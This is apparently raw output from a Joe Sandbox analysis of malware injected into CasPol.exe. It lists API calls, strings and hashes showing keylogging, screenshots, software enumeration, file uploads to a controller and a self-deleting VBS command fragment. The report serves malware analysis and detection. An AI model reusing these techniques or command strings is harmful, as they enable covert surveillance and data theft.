                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                            • API String ID: 1579085052-1280438975
                                                                                                            • Opcode ID: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                                                                                                            • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                                                                            • Opcode Fuzzy Hash: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
                                                                                                            • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                            • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                            • GetLastError.KERNEL32 ref: 0041B323
                                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                            • GetLastError.KERNEL32 ref: 0041B380
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                            • String ID: ?
                                                                                                            • API String ID: 3941738427-1684325040
                                                                                                            • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                                            • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                            • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                                                            • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899193279-0
                                                                                                            • Opcode ID: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
                                                                                                            • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                            • Opcode Fuzzy Hash: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
                                                                                                            • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                            • API String ID: 1223786279-3931108886
                                                                                                            • Opcode ID: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                                                                                                            • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                            • Opcode Fuzzy Hash: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
                                                                                                            • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                            • API String ID: 2490988753-744132762
                                                                                                            • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                            • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                                                                                            • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                                                                                            • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041BB64
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumOpen
                                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                            • API String ID: 1332880857-3714951968
                                                                                                            • Opcode ID: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                                                                                                            • Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
                                                                                                            • Opcode Fuzzy Hash: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
                                                                                                            • Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                            • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                            • API String ID: 911427763-1497357211
                                                                                                            • Opcode ID: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                                                                                                            • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                            • Opcode Fuzzy Hash: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
                                                                                                            • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                            • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                            • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                            • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                            • String ID: Close
                                                                                                            • API String ID: 1657328048-3535843008
                                                                                                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                            • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                            • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$Info
                                                                                                            • String ID:
                                                                                                            • API String ID: 2509303402-0
                                                                                                            • Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                            • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                            • Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                            • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                            • API String ID: 1884690901-3066803209
                                                                                                            • Opcode ID: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                                                                                                            • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                            • Opcode Fuzzy Hash: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
                                                                                                            • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                            • API String ID: 3795512280-3163867910
                                                                                                            • Opcode ID: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                                                                                                            • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                            • Opcode Fuzzy Hash: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
                                                                                                            • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                            • _free.LIBCMT ref: 004500B6
                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                            • _free.LIBCMT ref: 004500D8
                                                                                                            • _free.LIBCMT ref: 004500ED
                                                                                                            • _free.LIBCMT ref: 004500F8
                                                                                                            • _free.LIBCMT ref: 0045011A
                                                                                                            • _free.LIBCMT ref: 0045012D
                                                                                                            • _free.LIBCMT ref: 0045013B
                                                                                                            • _free.LIBCMT ref: 00450146
                                                                                                            • _free.LIBCMT ref: 0045017E
                                                                                                            • _free.LIBCMT ref: 00450185
                                                                                                            • _free.LIBCMT ref: 004501A2
                                                                                                            • _free.LIBCMT ref: 004501BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                            • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                            • API String ID: 489098229-65789007
                                                                                                            • Opcode ID: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                                                                                                            • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                            • Opcode Fuzzy Hash: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
                                                                                                            • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                            • API String ID: 1913171305-390638927
                                                                                                            • Opcode ID: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                                                                                                            • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                            • Opcode Fuzzy Hash: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
                                                                                                            • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                            • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                            • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                            • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                            APIs
                                                                                                              • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                            • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                            • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                            • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                            • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                            • GetLastError.KERNEL32 ref: 00454C68
                                                                                                            • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                            • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                            • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                            • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 65535$udp
                                                                                                            • API String ID: 0-1267037602
                                                                                                            • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                            • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                            • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                            • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
